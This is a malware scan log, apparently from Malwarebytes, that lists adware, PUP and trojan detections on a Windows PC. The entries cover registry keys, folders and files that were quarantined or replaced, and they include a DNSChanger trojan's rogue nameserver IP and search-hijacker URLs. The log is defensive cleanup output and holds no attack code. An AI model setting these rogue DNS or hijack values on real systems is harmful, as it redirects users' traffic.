    PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\WOW6432NODE\SEARCHPROTECT|InstallDir, C:\PROGRA~2\SearchProtect, Quarantined, [514e561d5c3e1e1827e516c8e51e23dd]
    PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\WOW6432NODE\SPPDCOM|TS, 1, Quarantined, [1788c6adc3d7082e29e4f8e64db6c33d]
    PUP.Optional.DesktopFind, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\DeskTop_E|ImagePath, C:\ProgramData\desktopfindkey\desktop189.exe, Quarantined, [7b24aec5f5a56acc684eedf161a302fe]
    PUP.Optional.Elex, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\FASTCOMPRESS|ImagePath, C:\Program Files (x86)\FastCompress-Zip\Fast_Support.exe, Quarantined, [148b83f0841636004a59d5e4c53fc739]
    PUP.Optional.SearchProtect.AppFlsh, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\SPPD|ImagePath, \??\C:\WINDOWS\system32\drivers\SPPD.sys, Quarantined, [67387300b7e3a2945eb18d516a99669a]
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\ENVIRONMENT|SNP, http://feed.snapdo.com?publisher=AP...016&barcodeid=50027003&channelid=3&av=windows, Quarantined, [039cec8717832214d812ec08aa599a66]
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\ENVIRONMENT|SNF, C:\ProgramData\Doubleings\snp.sc, Quarantined, [0897155e405ad75f8762d2229b68e41c]
    PUP.Optional.IEAudioAds, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\INSTALLPATH\STATUS|NuvisionDataRemarketer, N, Quarantined, [e0bfe98a6c2e81b5738205a05ca7c937]
    PUP.Optional.Linkury, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ielnksrch}|DisplayName, Search the web, Quarantined, [148b7bf87426cf67160723d115ee09f7]
    PUP.Optional.Conduit, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, http://www.bing.com/search?pc=COSP&...form=CONBDF&conlogo=CT3334491&q={searchTerms}, Quarantined, [57486211e2b820163358a3f957ac7f81]
    PUP.Optional.Conduit, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|TopResultURL, http://www.bing.com/search?pc=COSP&...form=CONBDF&conlogo=CT3334491&q={searchTerms}, Quarantined, [950aa4cfebafaf87513ad7c557ace719]
    PUP.Optional.Search.ShrtCln, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{533D4D7B-F377-41D8-B141-A29968AF875A}|OSDFileURL, http://www-searching.com/opensearch.ashx?s=G9Izftpbl0cshmoAU,488cdb43-66e8-4d85-9ddc-52057119e93e,, Quarantined, [cad5ea89a7f37bbb58410cdb28db9b65]
    PUP.Optional.Search.ShrtCln, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{533D4D7B-F377-41D8-B141-A29968AF875A}|FaviconURL, http://www-searching.com/favicon.ico, Quarantined, [7926beb5752533036039a4431ce7c13f]
    PUP.Optional.Search.ShrtCln, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{533D4D7B-F377-41D8-B141-A29968AF875A}|URL, http://www-searching.com/s.ashx?prd...0cshmoAU,488cdb43-66e8-4d85-9ddc-52057119e93e,, Quarantined, [f3aca9cac8d2cb6b9bfee2057f84e11f]
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ielnksrch}|URL, http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}, Quarantined, [3867c0b3bcde2f07d3eca15512f18e72]
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHURL|Default, http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}, Quarantined, [4b54d59ed1c95ed8dbe5589e9271ad53]
    PUP.Optional.TempLaunch, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|Pritc, C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe, Quarantined, [a8f7155e1c7e48ee1334a328788a669a]
    PUP.Optional.ProductSetup, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\PRODUCTSETUP|tb, 0G2O2W1R0C1R1H, Quarantined, [fca3fb78c5d50a2c339502aec83bf60a]
    PUP.Optional.SystemHealer, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\SYSTEM HEALER|CartURL, 1, Quarantined, [acf39cd7633746f0961837c67b88817f]

    Registry Data: 11
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|Start Page, https://ca.search.yahoo.com/yhs/web...03&type=wbf_dnldwz_16_37&param1=1&param2=fBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[7b241c57831763d3d57467123ec66799]D1%26bBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[7b241c57831763d3d57467123ec66799]DIE%26ccBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[7b241c57831763d3d57467123ec66799]Dca%26paBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[7b241c57831763d3d57467123ec66799]DWincy%26cdBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[7b241c57831763d3d57467123ec66799]D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyBtBtDtN1L2XzutAtFtByEtFyCtFzytN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StBzz0A0F0FyEyB0BtGtAyEtByDtG0CyDyC0EtGtAtC0F0DtG0DzzyCyDyE0C0ByDzz0F0F0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26crBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[7b241c57831763d3d57467123ec66799]D344908437%26aBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[7b241c57831763d3d57467123ec66799]Dwbf_dnldwz_16_37%26os_verBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[7b241c57831763d3d57467123ec66799]D6.1%26osBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[7b241c57831763d3d57467123ec66799]DWindowsGood: (www.google.com)B7Good: (www.google.com)BProfessional, %4, %5
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN|Start Page, https://ca.search.yahoo.com/yhs/web...03&type=wbf_dnldwz_16_37&param1=1&param2=fBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[e5ba363dc4d639fd79d03247f80c0af6]D1%26bBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[e5ba363dc4d639fd79d03247f80c0af6]DIE%26ccBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[e5ba363dc4d639fd79d03247f80c0af6]Dca%26paBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[e5ba363dc4d639fd79d03247f80c0af6]DWincy%26cdBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[e5ba363dc4d639fd79d03247f80c0af6]D2XzuyEtN2Y1L1Qzu0DtDyCyB0EyDyDyDtA0E0F0B0D0DtA0CtN0D0Tzu0StCyBtBtDtN1L2XzutAtFtByEtFyCtFzytN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StBzz0A0F0FyEyB0BtGtAyEtByDtG0CyDyC0EtGtAtC0F0DtG0DzzyCyDyE0C0ByDzz0F0F0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtByBtCyDyCyEtG0C0B0E0BtGyE0DyE0DtGzz0F0FyEtGtCtBzyyB0BzzyD0DyBtCtCyE2QtN0A0LzuyE%26crBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[e5ba363dc4d639fd79d03247f80c0af6]D344908437%26aBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[e5ba363dc4d639fd79d03247f80c0af6]Dwbf_dnldwz_16_37%26os_verBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[e5ba363dc4d639fd79d03247f80c0af6]D6.1%26osBad: (https://ca.search.yahoo.com/yhs/web...s_ver=6.1&os=Windows+7+Professional),Replaced,[e5ba363dc4d639fd79d03247f80c0af6]DWindowsGood: (www.google.com)B7Good: (www.google.com)BProfessional, %4, %5
    PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DefaultScope, {ielnksrch}, Good: ({0633EE93-D776-472f-A0FF-E1416B8B2E3A}), Bad: ({ielnksrch}),Replaced,[e4bbabc835653bfb1f3a6e0b13f1f60a]
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|Search Page, http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}, Good: (www.google.com), Bad: (http://feed.sonic-search.com/?p=mKO...PUEG8NrrMZu0aDqix5Q&q={searchTerms}),Replaced,[acf399daf8a280b6a3be215814f04fb1]
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|Search Bar, http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}, Good: (www.google.com), Bad: (http://feed.sonic-search.com/?p=mKO...PUEG8NrrMZu0aDqix5Q&q={searchTerms}),Replaced,[257aee8518827abcb2afa6d3d62e0df3]
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|SearchAssistant, http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}, Good: (www.google.com), Bad: (http://feed.sonic-search.com/?p=mKO...PUEG8NrrMZu0aDqix5Q&q={searchTerms}),Replaced,[7629670c9bff181e66fbf881a2621ee2]
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1896049756-2371463424-3974721238-500\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCH|Default_Search_URL, http://feed.sonic-search.com/?p=mKO...Y_9VAhkd0iPUEG8NrrMZu0aDqix5Q&q={searchTerms}, Good: (www.google.com), Bad: (http://feed.sonic-search.com/?p=mKO...PUEG8NrrMZu0aDqix5Q&q={searchTerms}),Replaced,[b9e60e65e1b98aacbaa8374232d219e7]
    Trojan.DNSChanger, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{847875CA-4350-447D-B3C9-2FCDA250440E}|NameServer, 104.197.191.4, Good: (), Bad: (104.197.191.4),Replaced,[900f690aabef53e3f041aad0d331926e]
    Trojan.DNSChanger, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{89A762F9-B74D-436A-84D8-F2F7E6D9B073}|NameServer, 104.197.191.4, Good: (), Bad: (104.197.191.4),Replaced,[633c94dfb5e583b36fc23e3c6b997888]
    Trojan.DNSChanger, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{B4EC977B-3636-4217-8CA1-D8DE45EDD7B6}|NameServer, 104.197.191.4, Good: (), Bad: (104.197.191.4),Replaced,[f0af94df83173ef878b992e8f01411ef]
    Trojan.DNSChanger, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{FE93FD32-9915-47D1-AB78-70D4CDC6F6D6}|NameServer, 104.197.191.4, Good: (), Bad: (104.197.191.4),Replaced,[a7f88fe43d5d5fd7f53cbfbb42c233cd]

    Folders: 35
    PUP.Optional.ConvertAd, C:\Users\Administrator\AppData\Local\4C4C4544-1474185518-5810-8038-B3C04F425431, Quarantined, [1e8162110f8b6bcb2aa53f5de61da759],
    PUP.Optional.ConvertAd, C:\Users\Administrator\AppData\Local\4C4C4544-1474195550-5810-8038-B3C04F425431, Quarantined, [7d22c5aed7c3f83e04cb673534cf8779],
    PUP.Optional.ConvertAd, C:\Users\Administrator\AppData\Local\4C4C4544-1474227849-5810-8038-B3C04F425431, Quarantined, [4b54a2d1afebb58128a7a6f692718080],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.Linkury, C:\Windows\Temp\Smartbar, Quarantined, [1d82492acfcb57dffe1e9d57927112ee],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\index-dir, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta, Delete-on-Reboot, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr, Delete-on-Reboot, [138cc3b0d9c179bdfa37678832d2ba46],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}, Quarantined, [e1bea2d1c3d759dd392ef2d049b9cf31],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}\{FBC0652C-7B29-4FB6-8ADA-91F54B267AD4}, Quarantined, [e1bea2d1c3d759dd392ef2d049b9cf31],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}\{FBC0652C-7B29-4FB6-8ADA-91F54B267AD4}\1.5, Quarantined, [e1bea2d1c3d759dd392ef2d049b9cf31],
    PUP.Optional.Goobzo.Gen, C:\Program Files\Common Files\Noobzo, Quarantined, [f5aa75fea9f10e28c1b4616608fa748c],
    PUP.Optional.Goobzo.Gen, C:\Program Files\Common Files\Noobzo\GNUpdate, Quarantined, [f5aa75fea9f10e28c1b4616608fa748c],
    PUP.Optional.DNSUnlocker.ACMB2, C:\ProgramData\1f0ab4e9-4821-0, Quarantined, [87180f6493077abcecad9e290df5a45c],
    PUP.Optional.DNSUnlocker.ACMB2, C:\ProgramData\1f0ab4e9-7297-1, Quarantined, [b5eabbb89ffb43f345541fa8778bcb35],
    PUP.Optional.DNSUnlocker.ACMB2, C:\ProgramData\4f8a1888-4c51-1, Quarantined, [831c096a7f1b90a603965d6a42c048b8],
    PUP.Optional.DNSUnlocker.ACMB2, C:\ProgramData\4f8a1888-71e5-0, Quarantined, [dbc48fe4c8d2f83ee3b620a70bf75fa1],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\tuto_monetize_120160918, Quarantined, [c9d6244f5f3b9c9ac21376517989d729],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\tuto_monetize_120160918\tuto_monetize_120160918, Quarantined, [c9d6244f5f3b9c9ac21376517989d729],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\tuto_monetize_120160918\tuto_monetize_120160918\2.00, Quarantined, [c9d6244f5f3b9c9ac21376517989d729],
    PUP.Optional.Elex, C:\ProgramData\Doubleing, Quarantined, [059a670c079363d30b36a01a3acadc24],
    PUP.Optional.LockHomepage, C:\Users\Administrator\AppData\Roaming\lockhomepage, Quarantined, [5c431162108ae3539b92dcf325df60a0],
    PUP.Optional.DesktopFind, C:\ProgramData\desktopfindkey, Delete-on-Reboot, [633c93e0fe9cff370daa12cc7a8a748c],
    PUP.Optional.DesktopFind, C:\ProgramData\desktopfindkey\update, Quarantined, [633c93e0fe9cff370daa12cc7a8a748c],
    PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\Softcof, Quarantined, [d0cf274c38620d294587afed9272dc24],
    PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\K-Fax, Quarantined, [3b64f3804951f145d809c6d626de2ed2],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\libraries, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\nss, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\resources, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.SearchProtect, C:\Users\Administrator\AppData\Local\bvyvcvd, Quarantined, [0996dd969ffb76c06891c8d4b4508878],

    Files: 733
    Rogue.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nertacs.exe, Delete-on-Reboot, [9a05046f85151b1b2b9f04eb8e76ba46],
    DDoSTool.Agent, C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe, Delete-on-Reboot, [e0bf9ed58e0c02343892308c0afac43c],
    PUP.Optional.Linkury.ACMB1, C:\ProgramData\Doubleing\IndigoString.dll, Quarantined, [445bfb78d1c959dd26a66e6b18ecaf51],
    PUP.Optional.LogicHandler, C:\Users\Administrator\AppData\Roaming\Betastock.bin, Quarantined, [2976b3c09cfe41f54aa286d851af5ba5],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Roaming\Freshdinfind.exe, Quarantined, [b3ec5320841684b2b0e346a2d43027d9],
    PUP.Optional.LogicHandler, C:\Users\Administrator\AppData\Roaming\MedJob.bin, Quarantined, [3b644330d5c587afd21a372728d80df3],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Roaming\Tipair.exe, Quarantined, [f1ae363dabef93a340539d4b32d2669a],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Roaming\Triodom.exe, Quarantined, [346b7ff4bcde1125bcd719cfcb3906fa],
    PUP.Optional.LogicHandler, C:\Users\Administrator\AppData\Roaming\True-Top.bin, Quarantined, [811ee98ab9e1072f39b3b9a52ed2fa06],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Roaming\VillaStattom.exe, Quarantined, [ebb4f3801e7cd363147fc52329dbaf51],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Roaming\Koncom.exe, Quarantined, [4a55a7cc1684d0661e75a6429d67cf31],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Roaming\Labin.exe, Quarantined, [7f20c3b0a2f887af2e65eff926de8d73],
    PUP.Optional.VBates.WnskRST, C:\Users\Administrator\AppData\Roaming\Gajedefsim\Wucmohhofd.dll, Quarantined, [dac5f47f108a70c6846aa03ae12030d0],
    PUP.Optional.Tuto4PC, C:\Program Files\Casterb\Uninstaller.exe, Quarantined, [fca32c47f2a8ce68207b36ba1ce84db3],
    PUP.Optional.WizzCaster, C:\Program Files\Casterb\wizzcaster.exe, Quarantined, [6e31c3b0e2b8181eb7016c64709426da],
    Adware.PennyBee, C:\Program Files\Icattib\Naacwe64.dll, Quarantined, [e1bebcb7a8f213234eb5dffbad54d927],
    Adware.PennyBee, C:\Program Files\Icattib\Xesbuhs64.dll, Quarantined, [326d0e652c6e8caae02357834db4f010],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\DPowerb\D7HVZHU1UW.exe, Quarantined, [643ba1d2188258debbe59353d829e11f],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\DPowerb\F10H5ROMJR.exe, Quarantined, [68378ce7a6f47bbb9b05c71f0ff27c84],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\DPowerb\NFQMP4E7QL.exe, Quarantined, [3966c1b27f1bb1850997984ee51c30d0],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\DPowerb\NMJA5FXU1Z.exe, Quarantined, [801f155e9bfff0460d934a9cd031659b],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\DPowerb\OMAX7YIRM1.exe, Quarantined, [0e913142ebaf003600a0b4320af702fe],
    PUP.Optional.EasyHotSpot, C:\Program Files (x86)\EasyHotspotb\EasyHotspot.exe, Quarantined, [643bb2c1f1a989adb9ab547edf227789],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\EasyHotspotb\idsccom_VGX.exe, Quarantined, [aef180f3f9a191a58e0d34b5f70a728e],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\EasyHotspotb\idscservice.exe, Quarantined, [1d82a8cb9bff68ceeeada44c9a6a7c84],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\EasyHotspotb\uninstaller.exe, Quarantined, [3966066daeecae8866350ee2dd27728e],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\hostb\i_network.exe, Quarantined, [891692e1c3d7b3839704638d60a4ff01],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\hostb\uninstaller.exe, Quarantined, [722d95dee3b7d363e7b427c9a06439c7],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\hostb\UninstallerCaster.exe, Quarantined, [4956b4bfb2e87db91487f8f8ac58e818],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\sunnydayb\wincom_1bYV.exe, Quarantined, [06997af9c3d768ce9902faef50b1ef11],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\sunnydayb\wincom_bCF4.exe, Quarantined, [207fd89bb0eacc6a7b202dbce61bd22e],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\sunnydayb\wincom_bTAO.exe, Quarantined, [c5daf57eefab54e27f1cb13840c129d7],
    PUP.Optional.Tuto4PC, C:\Program Files (x86)\sunnydayb\wincom_Hbn7U.exe, Quarantined, [5f406f041882a29475266e7b728f9e62],
    PUP.Optional.Tuto4PC, C:\$Recycle.Bin\S-1-5-21-1896049756-2371463424-3974721238-500\$RUSZACG.exe, Quarantined, [f2ada0d32377261035668967b54f20e0],
    PUP.Optional.Tuto4PC, C:\$Recycle.Bin\S-1-5-21-1896049756-2371463424-3974721238-500\$RIN85LU.exe, Quarantined, [0699ea89a6f481b5d7c41ad623e19d63],
    PUP.Optional.Tuto4PC, C:\$Recycle.Bin\S-1-5-21-1896049756-2371463424-3974721238-500\$RYCMKER.exe, Quarantined, [4c5384ef63373006cdced31d2dd72ad6],
    PUP.Optional.Tuto4PC, C:\$Recycle.Bin\S-1-5-21-1896049756-2371463424-3974721238-500\$R3Y9O1U.exe, Quarantined, [2a75d1a22d6df6405b407f71b74d26da],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\GMXVRMA49M.exe, Quarantined, [158aadc65248979f4e4d915fe123e818],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\UJXZFXYRJW.exe, Quarantined, [3c63e68d8d0d979f7457992f0ff547b9],
    Trojan.Agent, C:\Users\Administrator\AppData\Local\Temp\Uninstall.exe, Quarantined, [7e217ef5c5d5d561e46e407b827f20e0],
    PUP.Optional.ConvertAd, C:\Users\Administrator\AppData\Local\Temp\nsbF2B8.tmp, Quarantined, [ced16d068a1064d26b01323d4db752ae],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\NSGGCKCSHQ.exe, Quarantined, [a5faf083cbcf989e623907e924e08f71],
    PUP.Optional.ConvertAd, C:\Users\Administrator\AppData\Local\Temp\nsh1DCE.tmp, Quarantined, [d7c8145fa0fab086bab2de91fe06a759],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\LZNRZYLAR6.exe, Quarantined, [356a8be87129ac8a6b6be005fd0407f9],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\KFT2N0ATDM.exe, Quarantined, [435c9ad95b3fe94d1ead7b4d8b790ff1],
    Trojan.KorAd, C:\Users\Administrator\AppData\Local\Temp\KZ7ZData.7z, Quarantined, [2d72e78c21797eb8267d99447391748c],
    Rogue.TechSupportScam, C:\Users\Administrator\AppData\Local\Temp\Setup.exe, Quarantined, [bbe42251504a2b0b913aeb0426de51af],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\IED4GWN5X5.exe, Quarantined, [f9a62e452674fc3a5d3ecf2131d323dd],
    PUP.Optional.EasyHotSpot, C:\Users\Administrator\AppData\Local\Temp\IKCJH8XGY5.exe, Quarantined, [f6a9492aa4f681b5e56a2ba6778a22de],
    PUP.Optional.NoteUp, C:\Users\Administrator\AppData\Local\Temp\nsuAF49.tmp, Quarantined, [049b0370e1b9fa3cbb8174cee51cc13f],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\V3HV993T15.exe, Quarantined, [dcc394dfc7d3b77f3f8c0abec2424cb4],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\CUDP55BU9V.exe, Quarantined, [6936571ce2b85fd7f8a3797708fccc34],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\4S12IZDWBY.exe, Quarantined, [851ac1b2cad00f277823da167094d729],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\4092.tmp.exe, Quarantined, [d1ce680b801a4ee8ceb9588750b40ff1],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\1F11.tmp.exe, Quarantined, [8916442f376338fe94f3f4eb887c5ea2],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\9CD3.tmp.exe, Quarantined, [237cd79c336756e0ec9b0ad507fd52ae],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\C3E.tmp.exe, Quarantined, [653a9ad96b2f092d7a0d2eb1b450f60a],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\EC78.tmp.exe, Quarantined, [d1ce3a39e0ba0d29582fd00fb54fef11],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\5A.tmp.exe, Quarantined, [940b4c274a5053e30b7c2db221e3b64a],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\AOVEPYMA2R.exe, Quarantined, [a9f6571c2575e650e7e4b6120afa0df3],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\CAFJ5J70VJ.exe, Quarantined, [1788660d06941a1c2f9c309830d4d52b],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\E023.tmp.exe, Quarantined, [8916f47f7228e056c5c2845b8d777e82],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\6DB1.tmp.exe, Quarantined, [dcc32152d0ca9d992f58ac33a262669a],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\6DB2.tmp.exe, Quarantined, [0d92c9aa88126bcbb3d4b62918ec629e],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\D7F0.tmp.exe, Quarantined, [742bbab9801a57dfe4a3df0033d1a957],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\40B3.tmp.exe, Quarantined, [c9d6f3808b0fd75f6f18e1fe8c78ea16],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\9314.tmp.exe, Quarantined, [bde2f87b8f0b33030285627da55f2cd4],
    PUP.Optional.BundleInstaller, C:\Users\Administrator\AppData\Local\Temp\B67F.tmp.exe, Quarantined, [1986363d653580b63e4934ab81836799],
